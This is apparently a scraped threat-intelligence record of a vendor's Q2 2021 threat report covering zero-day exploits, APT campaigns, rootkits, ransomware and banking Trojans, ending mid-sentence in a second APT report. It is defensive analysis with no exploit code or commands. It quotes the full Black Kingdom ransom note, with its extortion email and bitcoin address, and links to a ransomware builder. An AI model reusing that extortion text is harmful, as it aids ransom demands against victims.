[CVE-2021-1732](<https://ti.dbappsecurity.com.cn/blog/index.php/2021/02/10/windows-kernel-zero-day-exploit-is-used-by-bitter-apt-in-targeted-attack/>) exploit, first discovered by DBAPPSecurity Threat Intelligence Center and used by the BITTER APT group, we found another zero-day exploit that we believe is linked to the same threat actor. We reported this new exploit to Microsoft in February and, after confirmation that it is indeed a zero-day, [Microsoft released a patch](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-28310>) for the new zero-day (CVE-2021-28310) as part of its April security updates.\n\nCVE-2021-28310 is an out-of-bounds (OOB) write vulnerability in dwmcore.dll, which is part of Desktop Window Manager (dwm.exe). Due to the lack of bounds checking, attackers are able to create a situation that allows them to write controlled data at a controlled offset using the DirectComposition API. [DirectComposition](<https://docs.microsoft.com/en-us/windows/win32/directcomp/directcomposition-portal>) is a Windows component that was introduced in Windows 8 to enable bitmap composition with transforms, effects and animations, with support for bitmaps of different sources (GDI, DirectX, etc.).\n\nThe exploit was initially identified by our advanced exploit prevention technology and related detection records. Over the past few years, we have built a multitude of exploit protection technologies into our products that have detected several zero-days, proving their effectiveness time and again.\n\nWe believe this exploit is used in the wild, potentially by several threat actors, and it is probably used together with other browser exploits to escape sandboxes or obtain system privileges for further access.\n\nYou can find technical details on the exploit in the '[Zero-day vulnerability in Desktop Window Manager (CVE-2021-28310) used in the wild](<https://securelist.com/zero-day-vulnerability-in-desktop-window-manager-cve-2021-28310-used-in-the-wild/101898/>)' post. Further information about BITTER APT and IOCs are available to customers of the Kaspersky Intelligence Reporting service: contact [intelreports@kaspersky.com](<mailto:intelreports@kaspersky.com>).\n\n### Operation TunnelSnake\n\nWindows rootkits, especially those operating in kernel space, enjoy high privileges in the system, allowing them to intercept and potentially tamper with core I/O operations conducted by the underlying OS, like reading or writing to files or processing incoming and outgoing network packets. Their ability to blend into the fabric of the operating system itself is how rootkits have gained their notoriety for stealth and evasion.\n\nNevertheless, over the years, it has become more difficult to deploy and execute a rootkit component in Windows. The introduction by Microsoft of Driver Signature Enforcement and Kernel Patch Protection (PatchGuard) has made it harder to tamper with the system. As a result, the number of Windows rootkits in the wild has decreased dramatically: most of those that are still active are often used in high-profile APT attacks.\n\nOne such example came to our attention during an investigation last year, in which we uncovered a previously unknown and stealthy implant in the networks of regional inter-governmental organizations in Asia and Africa. This rootkit, which we dubbed "Moriya", was used to deploy passive backdoors on public facing servers, facilitating the creation of a covert C2 (Command and Control) communication channel through which they can be silently controlled.\n\n[![](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/04/08151011/Operation_TunnelSnake_01.png)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/04/08151011/Operation_TunnelSnake_01.png>)\n\nThis tool was used as part of an ongoing campaign that we named "[TunnelSnake](<https://securelist.com/operation-tunnelsnake-and-moriya-rootkit/101831/>)". The rootkit was detected on the targeted machines as early as November 2019; and another tool we found, showing significant code overlaps with the rootkit, suggests that the developers had been active since at least 2018.\n\nSince neither the rootkit nor other lateral movement tools that accompanied it during the campaign relied on hardcoded C2 servers, we could gain only partial visibility into the attacker's infrastructure. However, the bulk of the detected tools besides Moriya, consist of both proprietary and well-known pieces of malware that were previously in use by Chinese-speaking threat actors, giving a clue to the attacker's origin.\n\n### PuzzleMaker\n\nOn April 14-15, Kaspersky technologies detected a wave of highly targeted attacks against multiple companies. Closer analysis revealed that all these attacks exploited a chain of Google Chrome and Microsoft Windows zero-day exploits.\n\nWhile we were not able to retrieve the exploit used for Remote Code Execution (RCE) in the Chrome web-browser, we were able to find and analyze an Escalation of Privilege (EoP) exploit used to escape the sandbox and obtain system privileges. This EoP exploit was fine-tuned to work against the latest and most prominent builds of Windows 10 (17763 - RS5, 18362 - 19H1, 18363 - 19H2, 19041 - 20H1, 19042 - 20H2), and exploits two distinct vulnerabilities in the Microsoft Windows OS kernel.\n\nOn April 20, we reported these vulnerabilities to Microsoft and they assigned CVE-2021-31955 to the Information Disclosure vulnerability and CVE-2021-31956 to the EoP vulnerability. Both vulnerabilities were patched on June 8, as a part of the June Patch Tuesday.\n\nThe exploit-chain attempts to install malware in the system through a dropper. The malware starts as a system service and loads the payload, a "remote shell"-style backdoor, which in turns connects to the C2 to get commands.\n\nWe weren't able to find any connections or overlaps with a known threat actor, so we tentatively named this cluster of activity [PuzzleMaker](<https://securelist.com/puzzlemaker-chrome-zero-day-exploit-chain/102771/>).\n\n### Andariel adds ransomware to its toolset\n\nIn April, we discovered a suspicious Word document containing a Korean file name and decoy uploaded to VirusTotal. The document contained an unfamiliar macro and used novel techniques to implant the next payload. Our telemetry revealed two infection methods used in these attacks, with each payload having its own loader for execution in memory. The threat actor only delivered the final stage payload for selected victims.\n\n[![](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/06/15094853/Andariel_delivered_ransomware_01-1024x272.png)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/06/15094853/Andariel_delivered_ransomware_01.png>)\n\nDuring the course of our research, Malwarebytes published a [report](<https://blog.malwarebytes.com/malwarebytes-news/2021/04/lazarus-apt-conceals-malicious-code-within-bmp-file-to-drop-its-rat/>) with technical details about the same series of attacks, which attributed it to the Lazarus group. However, after thorough analysis, we reached the conclusion that the attacks were the work of Andariel, a sub-group of Lazarus, based on code overlaps between the second stage payload in this campaign and previous malware from this threat actor.\n\nHistorically, Andariel has mainly targeted organizations in South Korea; and our telemetry suggests that this is also the case in this campaign. We confirmed several victims in the manufacturing, home network service, media and construction sectors.\n\n[![](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/06/15095550/Andariel_delivered_ransomware_08-1024x629.png)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/06/15095550/Andariel_delivered_ransomware_08.png>)\n\nWe also found additional connections with the Andariel group. Each threat actor has a characteristic habit when they interactively work with a backdoor shell in the post-exploitation phase of an attack. The way Windows commands and their options were used in this campaign is almost identical to previous Andariel activity.\n\nNotably, in addition to the final backdoor, we discovered one victim infected with custom ransomware, underlying the financial motivation of this threat actor.\n\n### Ferocious Kitten\n\n[Ferocious Kitten](<https://securelist.com/ferocious-kitten-6-years-of-covert-surveillance-in-iran/102806/>) is an APT threat actor that has targeted Persian-speaking individuals who appear to be based in Iran. The group has mostly operated under the radar and, as far as we know, has not been covered by security researchers. The threat actor attracted attention recently when a lure document was uploaded to VirusTotal and went public thanks to [researchers on Twitter](<https://twitter.com/reddrip7/status/1366703445990723585?s=21>). Since then, one of its implants [has been analyzed](<http://www.hackdig.com/03/hack-293629.htm>) by a Chinese threat intelligence firm.\n\nWe were able to expand on some of the findings about the group and provide insights into the additional variants that it uses. The malware dropped from the lure document, dubbed "MarkiRAT", records keystrokes, clipboard content, and provides file download and upload capabilities as well as the ability to execute arbitrary commands on the victim's computer. We were able to trace the implant back to at least 2015, along with variants intended to hijack the execution of Telegram and Chrome applications as a persistence method.\n\nFerocious Kitten is one of the groups that operate in a wider eco-system intended to track individuals in Iran. Such threat groups aren't reported very often; and so are able to re-use infrastructure and toolsets without worrying about them being taken down or flagged by security solutions. Some of the TTPs used by this threat actor are reminiscent of other groups that are active against a similar set of targets, such as Domestic Kitten and Rampant Kitten.\n\n## Other malware\n\n### Evolution of JSWorm ransomware\n\nWhile ransomware has been around for a long time, it has evolved over time as attackers have improved their technologies and refined their tactics. We have seen a shift away from the random, speculative attacks of five years ago, and even from the massive outbreaks such as [WannaCry](<https://securelist.com/wannacry-faq-what-you-need-to-know-today/78411/>) and [NotPetya](<https://securelist.com/expetrpetyanotpetya-is-a-wiper-not-ransomware/78902/>). Many ransomware gangs have switched to the more profitable tactic of "big-game hunting"; and news of ransomware attacks affecting large corporations, and even critical infrastructure installations, has become commonplace. Moreover, there's now a [well-developed eco-system underpinning ransomware attacks](<https://securelist.com/ransomware-world-in-2021/102169/>).\n\nAs a result, even though [the number of ransomware attacks has fallen](<https://securelist.com/ransomware-by-the-numbers-reassessing-the-threats-global-impact/101965/>), and individuals are probably less likely to encounter ransomware than a few years ago, the threat to organizations is greater than ever.\n\nWe recently published analysis of one such ransomware family, named [JSWorm](<https://securelist.com/evolution-of-jsworm-ransomware/102428/>). This malware was discovered in 2019, and since then different variants have gained notoriety under various names such as Nemty, Nefilim, Offwhite and others.\n\n[![](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/05/24115814/JSworm_malware_01-1024x341.png)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/05/24115814/JSworm_malware_01.png>)\n\nEach "re-branded" version has included alterations to different aspects of the code \u2013 file extensions, cryptographic schemes, encryption keys, programming language and distribution model. Since it emerged, JSWorm has developed from a typical mass-scale ransomware threat affecting mostly individual users into a typical big-game hunting ransomware threat attacking high-profile targets and demanding massive ransom payments.\n\n### Black Kingdom ransomware\n\n[Black Kingdom](<https://securelist.com/black-kingdom-ransomware/102873/>) first appeared in 2019; in 2020 the group was observed exploiting vulnerabilities (such as CVE-2019-11510) in its attacks. In recent activity, the ransomware was used by an unknown adversary for exploiting a Microsoft Exchange vulnerability (CVE-2021-27065, aka [ProxyLogon](<https://proxylogon.com/>)). This ransomware family is much less sophisticated than other [Ransomware-as-a-Service](<https://encyclopedia.kaspersky.com/glossary/ransomware-as-a-service-raas/?utm_source=securelist&utm_medium=blog&utm_campaign=termin-explanation>) (RaaS) or big game hunting families. The group's involvement in the Microsoft Exchange exploitation campaign suggests opportunism rather than a resurgence in activity from this ransomware family.\n\nThe malware is coded in Python and compiled to an executable using PyInstaller. The ransomware supports two encryption modes: one generated dynamically and one using a hardcoded key. Code analysis revealed an amateurish development cycle and the possibility of recovering files that have been encrypted with Black Kingdom with the help of the hardcoded key. At the time of analysis, there was already a [script to recover files encrypted with the embedded key](<https://blog.cyberint.com/black-kingdom-ransomware>).\n\nBlack Kingdom changes the desktop background to a note that the system is infected while it encrypts files, disabling the mouse and keyboard as it does so.\n \n \n ***************************\n | We Are Back ?\n ***************************\n \n We hacked your (( Network )), and now all files, documents, images,\n databases and other important data are safely encrypted using the strongest algorithms ever.\n You cannot access any of your files or services .\n But do not worry. You can restore everthing and get back business very soon ( depends on your actions )\n \n before I tell how you can restore your data, you have to know certain things :\n \n We have downloaded most of your data ( especially important data ) , and if you don't contact us within 2 days, your data will be released to the public.\n \n To see what happens to those who didn't contact us, just google : ( Blackkingdom Ransomware )\n \n ***************************\n | What guarantees ?\n ***************************\n \n We understand your stress and anxiety. So you have a free opportunity to test our service by instantly decrypting one or two files for free\n just send the files you want to decrypt to (support_blackkingdom2@protonmail.com\n \n ***************************************************\n | How to contact us and recover all of your files ?\n ***************************************************\n \n The only way to recover your files and protect from data leaks, is to purchase a unique private key for you that we only posses .\n \n \n [ + ] Instructions:\n \n 1- Send the decrypt_file.txt file to the following email ===> support_blackkingdom2@protonmail.com\n \n 2- send the following amount of US dollars ( 10,000 ) worth of bitcoin to this address :\n \n [ 1Lf8ZzcEhhRiXpk6YNQFpCJcUisiXb34FT ]\n \n 3- confirm your payment by sending the transfer url to our email address\n \n 4- After you submit the payment, the data will be removed from our servers, and the decoder will be given to you,\n so that you can recover all your files.\n \n ## Note ##\n \n Dear system administrators, do not think you can handle it on your own. Notify your supervisors as soon as possible.\n By hiding the truth and not communicating with us, what happened will be published on social media and yet in news websites.\n \n Your ID ==>\n FDHJ91CUSzXTquLpqAnP\n\nAfter decompiling the Python code, we discovered that the code base for Black Kingdom has its origins in an open-source ransomware builder [available on GitHub](<https://github.com/BuchiDen/Ransomware_RAASNet/blob/master/RAASNet.py>). The group adapted parts of the code, adding features that were not originally presented in the builder, such as the hardcoded key. We were not able to attribute Black Kingdom to any known threat group.\n\nBased on our telemetry, we could see only a few hits by Black Kingdom in Italy and Japan.\n\n### Gootkit: the cautious banking Trojan\n\n[Gootkit](<https://securelist.com/gootkit-the-cautious-trojan/102731/>) belongs to a class of Trojans that are extremely tenacious, but not widespread. Since it's not very common, new versions of the Trojan may remain under the researchers' radar for long periods.\n\nIt is complex multi-stage banking malware, which was initially discovered by Doctor Web in 2014. Initially, it was distributed via spam and exploits kits such as Spelevo and RIG. In conjunction with spam campaigns, the adversaries later switched to compromised websites where visitors are tricked into downloading the malware.\n\nGootkit is capable of stealing data from the browser, performing man-in-the-browser attacks, keylogging, taking screenshots, and lots of other malicious actions. The Trojan's loader performs various virtual machine and sandbox checks and uses sophisticated persistence algorithms.\n\nIn 2019, Gootkit stopped operating after it experienced a [data leak](<https://www.zdnet.com/article/gootkit-malware-crew-left-their-database-exposed-online-without-a-password/>), but has been [active again](<https://www.bleepingcomputer.com/news/security/gootkit-malware-returns-to-life-alongside-revil-ransomware/>) since November 2020. Most of the victims are located in EU countries such as Germany and Italy.\n\n### Bizarro banking Trojan expands into Europe\n\nBizarro is one more banking Trojan family originating from Brazil that is now found in other parts of the world. We have seen people being targeted in Spain, Portugal, France and Italy. This malware has been used to steal credentials from customers of 70 banks from different European and South American countries.\n\n[![](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/05/14143631/Bizarro_trojan_13.png)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/05/14143631/Bizarro_trojan_13.png>)\n\nAs with [Tetrade](<https://securelist.com/the-tetrade-brazilian-banking-malware/97779/>), Bizarro uses affiliates or recruits money mules to cash out or simply to help with money transfers.\n\nBizarro is distributed via MSI packages downloaded by victims from links in spam emails. Once launched, it downloads a ZIP archive from a compromised website. We observed hacked WordPress, Amazon and Azure servers used by the Trojan for storing archives. The backdoor, which is the core component of Bizarro, contains more than 100 commands and allows the attackers to steal online banking account credentials. Most of the commands are used to display fake pop-up messages and seek to trick people into entering two-factor authentication codes. The Trojan may also use social engineering to convince victims to download a smartphone app.\n\n[![](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/05/14143359/Bizarro_trojan_12-1024x762.png)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/05/14143359/Bizarro_trojan_12.png>)\n\nBizarro is one of several banking Trojans from South America that have extended their operations into other regions \u2013 mainly Europe. They include Guildma, Javali, Melcoz, Grandoreiro and Amavaldo.\n\n[![](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/05/17095011/Map_of_Brazilian_families-1024x1024.jpeg)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/05/17095011/Map_of_Brazilian_families.jpeg>)\n\n### Malicious code in APKPure app\n\nIn early April, we [discovered malicious code in version 3.17.18 of the official client of the APKPure app store](<https://securelist.com/apkpure-android-app-store-infected/101845/>), a popular alternative source of Android apps. [The incident seems to be similar to what happened with CamScanner](<https://www.kaspersky.com/blog/camscanner-malicious-android-app/28156/>), when the app's developer implemented an adware SDK from an unverified source.\n\nWhen launched, the embedded Trojan dropper, which our solutions detect as HEUR:Trojan-Dropper.AndroidOS.Triada.ap, unpacks and runs its payload, which is able to show ads on the lock screen, open browser tabs, collect information about the device, and download other malicious code. The Trojan downloaded depends on the version of Android and how recently security updates have been installed. In the case of relatively recent versions of the operating system (Android 8 or higher) it loads additional modules for the [Triada Trojan](<https://www.kaspersky.com/blog/triada-trojan/11481/>). If the device is older (Android 6 or 7, and without security updates installed) it could be the [xHelper Trojan](<https://securelist.com/unkillable-xhelper-and-a-trojan-matryoshka/96487/>).\n\nWe reported the issue to APKPure on April 8. APKPure acknowledged the problem the following day and, soon afterwards, posted a new version (3.17.19) that does not contain the malicious component.\n\n### Browser lockers\n\nBrowser lockers are designed to prevent the victim from using their browser unless they pay a ransom. The "locking" consists of preventing the victim from leaving the current tab, which displays intimidating messages, often with sound and visual effects. The locker tries to trick the victim into making a payment with threats of losing data or legal liability.\n\nThis type of fraud has long been on the radar of researchers, and over the last decade there have been numerous browser locking campaigns targeting people worldwide. The tricks used by the scammers include imitating the infamous "[Blue Screen of Death](<https://encyclopedia.kaspersky.com/glossary/blue-screen-of-death-bsod/?utm_source=securelist&utm_medium=blog&utm_campaign=termin-explanation>)" (BSOD) in the browser, false warnings about system errors or detected malware, threats to encrypt files and legal liability notices.\n\nIn our [report on browser lockers](<https://securelist.com/browser-lockers-extortion-disguised-as-a-fine/101735/>), we examined two families of lockers that mimic government websites.\n\n[![](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/04/01145253/MVD_fake_sites_07-1024x952.jpeg)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/04/01145253/MVD_fake_sites_07-scaled.jpeg>)\n\nBoth families spread mainly via advertising networks, primarily aimed at selling "adult" content and movies in an intrusive manner; for example, through tabs or windows that open on top of the visited site when loading a page with an embedded ad module (pop-ups), or after clicking anywhere on the page (click-unders).\n\nThese threats are not technically complex: they simply aim to create the illusion of having locked the computer and intimidate victims into paying money. Landing on such a page by mistake will not harm your device or compromise your data, as long as you don't fall for the cybercriminals' smoke-and-mirror tactics.\n\n### Malware targets Apple M1 chip\n\nLast November, Apple unveiled its M1 chip. The new chip, which has replaced Intel processors in several of its products, is based on ARM architecture instead of the x86 architecture traditionally used in personal computers. This lays the foundation for Apple to switch completely to its own processors and unify its software under a single architecture. Unfortunately, just months after the release, [malware writers had already adapted several malware families to the new processor](<https://securelist.com/malware-for-the-new-apple-silicon-platform/101137/>).\n\n### Attempted supply-chain attack using PHP\n\nIn March, [unknown attackers tried to carry out a supply-chain attack by introducing malicious code to the PHP scripting language](<https://www.kaspersky.com/blog/php-git-backdor/39191/>). The developers of PHP make changes to the code using a common repository built on the GIT version control system. The attackers tried to add a backdoor to the code. Fortunately, a developer noticed something suspicious during a routine check. Had they not done so, the backdoor might have allowed attackers to run malicious code remotely on web servers, in around 80 per cent of which (web servers) PHP is used.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 10.0, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 6.0}, "published": "2021-08-12T10:00:37", "type": "securelist", "title": "IT threat evolution Q2 2021", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-0802", "CVE-2019-11510", "CVE-2021-1732", "CVE-2021-27065", "CVE-2021-28310", "CVE-2021-31955", "CVE-2021-31956"], "modified": "2021-08-12T10:00:37", "id": "SECURELIST:934E8AA177A27150B87EC15F920BF350", "href": "https://securelist.com/it-threat-evolution-q2-2021/103597/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-08-04T10:41:58", "description": "![](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/03/12083054/green_digits_abstract-990x400.jpg)\n\nFor more than four years, the Global Research and Analysis Team (GReAT) at Kaspersky has been publishing quarterly summaries of advanced persistent threat (APT) activity. The summaries are based on our threat intelligence research and provide a representative snapshot of what we have published and discussed in greater detail in our private APT reports. They are designed to highlight the significant events and findings that we feel people should be aware of.\n\nThis is our latest installment, focusing on activities that we observed during Q2 2021.\n\nReaders who would like to learn more about our intelligence reports or request more information on a specific report are encouraged to contact [intelreports@kaspersky.com](<mailto:intelreports@kaspersky.com>).\n\n## The most remarkable findings\n\nInvestigating the recent Microsoft Exchange vulnerabilities we and our colleagues from AMR found an attacker deploying a previously unknown backdoor, "FourteenHi", in a campaign that we dubbed ExCone, active since mid-March. During our investigation we revealed multiple tools and variants of FourteenHi, configured with infrastructure that FireEye reported as being related to the UNC2643 activity cluster. Moreover, we saw ShadowPad detections coincide with FourteenHi variant infections, possibly hinting at a shared operator between these two malware families.\n\nFourteenHi abuses the popular VLC media player to execute its loader. It is capable of performing basic backdoor functions. Further investigation also revealed scripts used by the actor to gain situational awareness post-exploitation, as well as previous use of the infrastructure to operate Cobalt Strike Beacon.\n\nAlthough we couldn't directly attribute this activity to any known threat actor, we found older, highly similar 64-bit samples of the backdoor used in close proximity with ShadowPad malware, mostly known for its operations involving supply-chain attacks as an infection vector. Notably, we also found one C2 IP used in a 64-bit sample reportedly used in the UNC2643 activity set, associated with the HAFNIUM threat actor, also using Cobalt Strike, DLL side-loading and exploiting the same Exchange vulnerabilities.\n\n## Russian-speaking activity\n\nOn May 27 and 28, details regarding an ongoing email campaign against diplomatic entities throughout Europe and North America were released by Volexity and Microsoft. These attacks were attributed to Nobelium and APT29 by Microsoft and Volexity respectively. While we were able to verify the malware and possible targeting for this cluster of activity, we haven't been able to make a definitive assessment at this time about which threat actor is responsible, although we found ties to Kazuar. We have designated it as a new threat actor and named it "HotCousin". The attacks began with a spear-phishing email which led to an ISO file container being stored on disk and mounted. From here, the victim was presented with a LNK file made to look like a folder within an Explorer window. If the victim double clicked on it, the LNK then executed a loader written in .NET referred to as BoomBox, or a DLL. The execution chain ultimately ended with a Cobalt Strike beacon payload being loaded into memory. According to public blogs, targeting was widespread but focused primarily on diplomatic entities throughout Europe and North America: based on the content of the lure documents bundled with the malware, this assessment appears to be accurate. This cluster of activity was conducted methodically beginning in January with selective targeting and slow operational pace, then ramping up and ending in May. There are indications of previous activity from this threat actor dating back to at least October 2020, based on other Cobalt Strike payloads and loaders bearing similar toolmarks.\n\n## Chinese-speaking activity\n\nWhile investigating a recent rise of attacks against Exchange servers, we noticed a recurring cluster of activity that appeared in several distinct compromised networks. This cluster stood out because it used a formerly unknown Windows kernel mode rootkit and a sophisticated multi-stage malware framework aimed at providing remote control over the attacked servers. The former is used to hide the user mode malware's artefacts from investigators and security solutions, while demonstrating an interesting loading scheme involving the kernel mode component of an open source project named "Cheat Engine" to bypass the Windows Driver Signature Enforcement mechanism. We were able to determine that this toolset had been in use from as early as July 2020; and that the threat actor was mostly focused on Southeast Asian targets, including several governmental entities and telecoms companies. Since this was a long-standing operation, with high-profile victims, an advanced toolset and no affinity to a known threat actor, we decided to name the underlying cluster "GhostEmperor".\n\nAPT31 (aka ZIRCONIUM) is a Chinese-speaking intrusion set. This threat actor set up an ORB (Operational Relay Boxes) infrastructure, composed of several compromised SOHO routers, to target entities based in Europe (and perhaps elsewhere). As of the publication of our report in May, we had seen these ORBs used to relay Cobalt Strike communications and for anonymization proxying purposes. It is likely that APT31 uses them for other implants and ends as well (for example, exploit or malware staging). Most of the infrastructure put in place by APT31 comprises compromised Pakedge routers (RK1, RE1 and RE2). This little-known constructor specializes in small enterprise routers and network devices. So far, we don't know which specific vulnerability has been exploited by the intrusion set to compromise the routers. Nor do we currently possess telemetry that would provide further visibility into this campaign. We will, of course, continue to track these activities.\n\nFollowing our previous report on EdwardsPheasant, DomainTools and BitDefender published articles about malicious activities against targets in Southeast Asia which we believe, with medium to high confidence, are parts of EdwardsPheasant campaigns. While tracking the activities of this threat actor, analyzing samples discovered or provided by third parties, and investigating from public IoCs, we discovered an updated DropPhone implant, an additional implant loaded by FoundCore's shellcode, several possible new infection documents and malicious domain names, as well as additional targets. While we do not believe we have a complete picture of this set of activities yet, our report this quarter marks a significant step further in understanding its extent.\n\nA Chinese-speaking APT compromised a certificate authority in Mongolia and replaced digital certificate management client software with a malicious downloader in February. We are tracking this group as BountyGlad. Related infrastructure was identified and used in multiple other incidents: interesting related activity included server-side attacks on WebSphere and WebLogic services in Hong Kong; and on the client-side, Trojanized Flash Player installers. The group demonstrated an increase in strategic sophistication with this supply-chain attack. While replacing a legitimate installer on a high value website like a certificate authority requires a medium level of skill and coordination, the technical sophistication is not on par with ShadowHammer. And while the group deploys fairly interesting, but simplistic, steganography to cloak its shellcode, we think it was probably generated with code that has been publicly available for years. Previous activity also connected with this group relied heavily on spear-phishing and Cobalt Strike throughout 2020. Some activity involved PowerShell commands and loader variants different from the downloaders presented in our recent report. In addition to spear-phishing, the group appears to rely on publicly available exploits to penetrate unpatched target systems. They use implants and C2 (Command and Control) code that are a mix of both publicly available and privately shared across multiple Chinese-speaking APTs. We are able to connect infrastructure across multiple incidents. Some of those were focused on Western targets in 2020. Some of the infrastructure listed in an FBI Flash alert published in May 2020, targeting US organizations conducting COVID-19 research, was also used by BountyGlad.\n\nWhile investigating users infected with the TPCon backdoor, previously discussed in a private report, we detected loaders which are part of a new multi-plugin malware framework that we named "QSC", which allows attackers to load and run plugins in-memory. We attribute the use of this framework to Chinese-speaking groups, based on some overlaps in victimology and infrastructure with other known tools used by these groups. We have so far observed the malware loading a Command shell and File Manager plugins in-memory. We believe the framework has been used in the wild since April 2020, based on the compilation timestamp of the oldest sample found. However, our telemetry suggests that the framework is still in use: the latest activity we detected was in March this year.\n\nEarlier this month, Rostelecom Solar and NCIRCC issued a joint public report describing a series of attacks against networks of government entities in Russia. The report described a formerly unknown actor leveraging an infection chain that leads to the deployment of two implants - WebDav-O and Mail-O. Those, in conjunction with other post-exploitation activity, have led to network-wide infections in the targeted organizations that resulted in exfiltration of sensitive data. We were able to trace the WebDav-O implant's activity in our telemetry to at least 2018, indicating government affiliated targets based in Belarus. Based on our investigation, we were able to find additional variants of the malware and observe some of the commands executed by the attackers on the compromised machines.\n\nWe discovered a cluster of activity targeting telecom operators within a specific region. The bulk of this activity took place from May to October 2020. This activity made use of several malware families and tools; but the infrastructure, a staging directory, and in-country target profiles tie them together. The actors deployed a previously unknown passive backdoor, that we call "TPCon", as a primary implant. It was later used to perform both reconnaissance within target organizations and to deploy a post-compromise toolset made up mostly of publicly available tools. We also found other previously unknown active backdoors, that we call "evsroin", used as secondary implants. Another interesting find was a related loader (found in a staging directory) that loaded a KABA1 implant variant. KABA1 was an implant used against targets throughout the South China Sea that we attributed to the Naikon APT back in 2016. On another note, on the affected hosts we found additional multiple malware families shared by Chinese-speaking actors, such as ShadowPad and Quarian backdoors. These did not seem to be directly connected to the TPCon/evsroin incidents because the supporting infrastructure appeared to be completely separate. One of the ShadowPad samples appears to have been detected in 2020, while the others were detected well before that, in 2019. Besides the Naikon tie, we found some overlaps with previously reported IceFog and IamTheKing activities.\n\n## Middle East\n\nBlackShadow is a threat group that became known after exfiltrating sensitive documents from Shirbit, an Israeli insurance company, and demanding a ransom in exchange for not releasing the information in its possession. Since then, the group has made more headlines, breaching another company in Israel and publishing a trove of documents containing customer related information on Telegram. Following this, we found several samples of the group's unique .NET backdoor in our telemetry that were formerly unknown to us, one of which was recently detected in Saudi Arabia. By pivoting on new infrastructure indicators that we observed in those samples, we were able to find a particular C2 server that was contacted by a malicious Android implant and shows ties to the group's activity.\n\nWe previously covered a WildPressure campaign against targets in the Middle East . Keeping track of the threat actor's malware this spring, we were able to find a newer version (1.6.1) of their C++ Trojan, a corresponding VBScript variant with the same version and a completely new set of modules, including an orchestrator and three plugins. This confirms our previous assumption that there are more last-stagers besides the C++ ones, based on one of the fields in the C2 communication protocol which contains the "client" programming language. Another language used by WildPressure is Python. The PyInstaller module for Windows contains a script named "Guard". Perhaps the most interesting finding here is that this malware was developed for both Windows and macOS operating systems. In this case, the hardcoded version is 2.2.1. The coding style, overall design and C2 communication protocol is quite recognisable across all programming languages used by the attackers. The malware used by WildPressure is still under active development in terms of versions and programming languages in use. Although we could not associate WildPressure's activity with other threat actors, we did find minor similarities in the TTPs (Tactics, Techniques and Procedures) used by BlackShadow, which is also active in the same region. However, we consider that these similarities serve as minor ties and are not enough to make any attribution.\n\nWe discovered an ongoing campaign that we attribute to an actor named WIRTE, beginning in late 2019, targeting multiple sectors, focused on the Middle East. WIRTE is a lesser-known threat actor first publicly referenced in 2019, which we suspect has relations with the Gaza Cybergang threat actor group. During our hunting efforts, in February, for threat actor groups that are using VBS/VBA implants, we came across MS Excel droppers that use hidden spreadsheets and VBA macros to drop their first stage implant - a VBS script. The VBS script's main function is to collect system information and execute arbitrary code sent by the attackers. Although we recently reported on a new Muddywater first stage VBS implant used for reconnaissance and profiling activities, these intrusion sets have slightly different TTPs and wider targeting. To date, we have recorded victims focused in the Middle East and a few other countries outside this region. Despite various industries being affected, the focus was mainly towards government and diplomatic entities; however, we also noticed an unusual targeting of law firms.\n\nGoldenJackal is the name we have given to a cluster of activity, recently discovered in our telemetry, that has been active since November 2019. This intrusion set consists of a set of .NET-based implants that are intended to control victim machines and exfiltrate certain files from them, suggesting that the actor's primary motivation is espionage. Furthermore, the implants were found in a restricted set of machines associated with diplomatic entities in the Middle East. Analysis of the aforementioned malware, as well as the accompanied detection logs, portray a capable and moderately stealthy actor. This can be substantiated by the successful foothold gained by the underlying actor in the few organizations we came across, all the while keeping a low signature and ambiguous footprint.\n\n## Southeast Asia and Korean Peninsula\n\nThe ScarCruft group is a geo-political motivated APT group that usually attacks government entities, diplomats and individuals associated with North Korean affairs. Following our last report about this group, we had not seen its activities for almost a year. However, we observed that ScarCruft compromised a North Korea-related news media website in January, beginning a campaign that was active until March. The attackers utilized the same exploit chains, CVE-2020-1380 and CVE-2020-0986, also used in [Operation Powerfall](<https://securelist.com/operation-powerfall-cve-2020-0986-and-variants/98329/>). Based on the exploit code and infection scheme characteristics, we suspect that Operation PowerFall has a connection with the ScarCruft group. The exploit chain contains several stages of shellcode execution, finally deploying a Windows executable payload in memory. We discovered several victims from South Korea and Singapore. Besides this watering-hole attack, this group also used Windows executable malware concealing its payload. This malware, dubbed "ATTACK-SYSTEM", also used multi-stage shellcode infection to deliver the same final payload named 